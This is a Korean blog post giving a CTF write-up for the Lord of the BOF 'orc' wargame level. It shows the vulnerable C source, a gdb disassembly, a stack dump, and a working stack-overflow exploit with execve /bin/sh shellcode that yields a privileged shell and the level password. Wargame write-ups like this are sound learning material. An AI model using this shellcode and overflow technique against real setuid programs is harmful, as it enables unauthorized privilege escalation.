시작

안녕하세요 :D

축구장 갔다가.. 야구장 갔다가.. PC방 갔다가.. 어느 새 내일 복귀네요 ㅎㅎ!!

오늘 챔스 보기 전까지 LOB로 달려야겠습니다ㅠ

쉬운 문제는 롸업 쓰기 너무 귀찮지만!! 안 쓰면 허전하잖아요!! 빨리 지나가죠

Write UP

[goblin@localhost goblin]$ ll 
total 20 
-rwsr-sr-x    1 orc      orc         12567 Feb 26  2010 orc 
-rw-r--r--    1 root     root          505 Mar 29  2010 orc.c 
[goblin@localhost goblin]$ 
[goblin@localhost goblin]$ cat orc.c 
/* 
        The Lord of the BOF : The Fellowship of the BOF 
        - orc 
        - egghunter 
*/ 

#include  
#include  

extern char **environ; 

main(int argc, char *argv[]) 
{ 
        char buffer[40]; 
        int i; 

        if(argc < 2){ 
                printf("argv error\n"); 
                exit(0); 
        } 

        // egghunter 
        for(i=0; environ[i]; i++) 
                memset(environ[i], 0, strlen(environ[i])); 

        if(argv[1][47] != '\xbf') 
        { 
                printf("stack is still your friend.\n"); 
                exit(0); 
        } 

        strcpy(buffer, argv[1]); 
        printf("%s\n", buffer); 
}

memset 함수에 의해 환경변수가 0으로 초기화되네요.

그런데 우리는 환경변수에 쉘코드를 저장하지 않습니다. RET 뒤에 펼쳐진 공간에 뿌릴 뿐..

가볍게 무시하고 저번 문제와 비슷한 페이로드를 작성해봅시다.

[goblin@localhost goblin]$ gdb -q /tmp/orc 
(gdb) set disassembly-flavor intel 
(gdb) disas main 
Dump of assembler code for function main: 
0x8048500 :       push   %ebp 
0x8048501 <main+1>:     mov    %ebp,%esp 
0x8048503 <main+3>:     sub    %esp,44 
0x8048506 <main+6>:     cmp    DWORD PTR [%ebp+8],1 
0x804850a <main+10>:    jg     0x8048523 <main+35> 
0x804850c <main+12>:    push   0x8048630 
0x8048511 <main+17>:    call   0x8048410  
0x8048516 <main+22>:    add    %esp,4 
0x8048519 <main+25>:    push   0 
0x804851b <main+27>:    call   0x8048420  
0x8048520 <main+32>:    add    %esp,4 
0x8048523 <main+35>:    nop 
0x8048524 <main+36>:    mov    DWORD PTR [%ebp-44],0x0 
0x804852b <main+43>:    nop 
0x804852c <main+44>:    lea    %esi,[%esi*1] 
0x8048530 <main+48>:    mov    %eax,DWORD PTR [%ebp-44] 
0x8048533 <main+51>:    lea    %edx,[%eax*4] 
0x804853a <main+58>:    mov    %eax,%ds:0x8049750 
0x804853f <main+63>:    cmp    DWORD PTR [%eax+%edx],0 
0x8048543 <main+67>:    jne    0x8048547 <main+71> 
0x8048545 <main+69>:    jmp    0x8048587 <main+135> 
0x8048547 <main+71>:    mov    %eax,DWORD PTR [%ebp-44] 
0x804854a <main+74>:    lea    %edx,[%eax*4] 
0x8048551 <main+81>:    mov    %eax,%ds:0x8049750 
0x8048556 <main+86>:    mov    %edx,DWORD PTR [%eax+%edx] 
0x8048559 <main+89>:    push   %edx 
0x804855a <main+90>:    call   0x80483f0  
0x804855f <main+95>:    add    %esp,4 
0x8048562 <main+98>:    mov    %eax,%eax 
0x8048564 <main+100>:   push   %eax 
0x8048565 <main+101>:   push   0 
0x8048567 <main+103>:   mov    %eax,DWORD PTR [%ebp-44] 
0x804856a <main+106>:   lea    %edx,[%eax*4] 
0x8048571 <main+113>:   mov    %eax,%ds:0x8049750 
0x8048576 <main+118>:   mov    %edx,DWORD PTR [%eax+%edx] 
0x8048579 <main+121>:   push   %edx 
0x804857a <main+122>:   call   0x8048430  
0x804857f <main+127>:   add    %esp,12 
0x8048582 <main+130>:   inc    DWORD PTR [%ebp-44] 
0x8048585 <main+133>:   jmp    0x8048530 <main+48> 
0x8048587 <main+135>:   mov    %eax,DWORD PTR [%ebp+12] 
0x804858a <main+138>:   add    %eax,4 
0x804858d <main+141>:   mov    %edx,DWORD PTR [%eax] 
0x804858f <main+143>:   add    %edx,47 
0x8048592 <main+146>:   cmp    BYTE PTR [%edx],0xbf 
0x8048595 <main+149>:   je     0x80485b0 <main+176> 
0x8048597 <main+151>:   push   0x804863c 
0x804859c <main+156>:   call   0x8048410  
0x80485a1 <main+161>:   add    %esp,4 
0x80485a4 <main+164>:   push   0 
0x80485a6 <main+166>:   call   0x8048420  
0x80485ab <main+171>:   add    %esp,4 
0x80485ae <main+174>:   mov    %esi,%esi 
---Type  to continue, or q  to quit--- 
0x80485b0 <main+176>:   mov    %eax,DWORD PTR [%ebp+12] 
0x80485b3 <main+179>:   add    %eax,4 
0x80485b6 <main+182>:   mov    %edx,DWORD PTR [%eax] 
0x80485b8 <main+184>:   push   %edx 
0x80485b9 <main+185>:   lea    %eax,[%ebp-40] 
0x80485bc <main+188>:   push   %eax 
0x80485bd <main+189>:   call   0x8048440  
0x80485c2 <main+194>:   add    %esp,8 
0x80485c5 <main+197>:   lea    %eax,[%ebp-40] 
0x80485c8 <main+200>:   push   %eax 
0x80485c9 <main+201>:   push   0x8048659 
0x80485ce <main+206>:   call   0x8048410  
0x80485d3 <main+211>:   add    %esp,8 
0x80485d6 <main+214>:   leave 
0x80485d7 <main+215>:   ret 
0x80485d8 <main+216>:   nop 
0x80485d9 <main+217>:   nop 
0x80485da <main+218>:   nop 
0x80485db <main+219>:   nop 
0x80485dc <main+220>:   nop 
0x80485dd <main+221>:   nop 
0x80485de <main+222>:   nop 
0x80485df <main+223>:   nop 
End of assembler dump. 
(gdb) b *main+194 
Breakpoint 1 at 0x80485c2 
(gdb) r `python -c 'print "A" * 44 + "BBB" + "\xbf" + "\x90" * 100 + "CCCC"'` 
Starting program: /tmp/orc `python -c 'print "A" * 44 + "BBB" + "\xbf" + "\x90" * 100 + "CCCC"'` 

Breakpoint 1, 0x80485c2 in main () 
(gdb) x/100wx $esp 
0xbffffa74:     0xbffffa80      0xbffffbf5      0x00000014      0x41414141 
0xbffffa84:     0x41414141      0x41414141      0x41414141      0x41414141 
0xbffffa94:     0x41414141      0x41414141      0x41414141      0x41414141 
0xbffffaa4:     0x41414141      0x41414141      0xbf424242      0x90909090 
0xbffffab4:     0x90909090      0x90909090      0x90909090      0x90909090 
0xbffffac4:     0x90909090      0x90909090      0x90909090      0x90909090 
0xbffffad4:     0x90909090      0x90909090      0x90909090      0x90909090 
0xbffffae4:     0x90909090      0x90909090      0x90909090      0x90909090 
0xbffffaf4:     0x90909090      0x90909090      0x90909090      0x90909090 
0xbffffb04:     0x90909090      0x90909090      0x90909090      0x90909090 
0xbffffb14:     0x43434343      0xbffffe00      0xbffffeea      0xbffffeff 
0xbffffb24:     0xbfffff1d      0xbfffff28      0xbfffff37      0xbfffff3f 
0xbffffb34:     0xbfffff50      0xbfffff5a      0xbfffff68      0xbfffff79 
0xbffffb44:     0xbfffff87      0xbfffff92      0xbfffffa4      0x00000000 
0xbffffb54:     0x00000003      0x08048034      0x00000004      0x00000020 
0xbffffb64:     0x00000005      0x00000006      0x00000006      0x00001000 
0xbffffb74:     0x00000007      0x40000000      0x00000008      0x00000000 
0xbffffb84:     0x00000009      0x08048450      0x0000000b      0x000001f7 
0xbffffb94:     0x0000000c      0x000001f7      0x0000000d      0x000001f7 
0xbffffba4:     0x0000000e      0x000001f7      0x00000010      0x0f8bfbff 
0xbffffbb4:     0x0000000f      0xbffffbe7      0x00000000      0x00000000 
0xbffffbc4:     0x00000000      0x00000000      0x00000000      0x00000000 
0xbffffbd4:     0x00000000      0x00000000      0x00000000      0x00000000 
0xbffffbe4:     0x69000000      0x00363836      0x706d742f      0x63726f2f 
0xbffffbf4:     0x41414100      0x41414141      0x41414141      0x41414141 
(gdb) q 
The program is running.  Exit anyway? (y or n) y 
[goblin@localhost goblin]$ ./orc `python -c 'print "A" * 44 + "\xc4\xfa\xff\xbf" + "\x90" * 100 + "\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80"'` 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒1▒1̀▒É▒1▒F̀1▒Ph//shh/bin▒▒PS▒▒° 
                                                             ̀1▒̀ 
bash$ id 
uid=504(orc) gid=503(goblin) egid=504(orc) groups=503(goblin) 
bash$ /bin/my-pass 
euid = 504 
cantata

Exploit!!

자세한 설명은 이전 글들에 나와있으니 참고해주세요!

마무리

시간이 얼마 남지 않았습니다ㅠㅠ 다음 문제 바로 풀어보죠 :D

'CTF_Write_UP > LOB' 카테고리의 다른 글

[LOB] wolfman (0)	2019.05.09
[LOB] orc (0)	2019.05.09
[LOB] cobolt (0)	2019.05.05
[LOB] gremlin (0)	2019.05.04
[LOB] gate (0)	2019.05.04

보안 초보의 성장일지

[LOB] goblin

시작

Write UP

마무리

'CTF_Write_UP > LOB' 카테고리의 다른 글

티스토리툴바

[LOB] goblin

시작

Write UP

마무리

'CTF_Write_UP > LOB' 카테고리의 다른 글

'CTF_Write_UP/LOB' Related Articles

티스토리툴바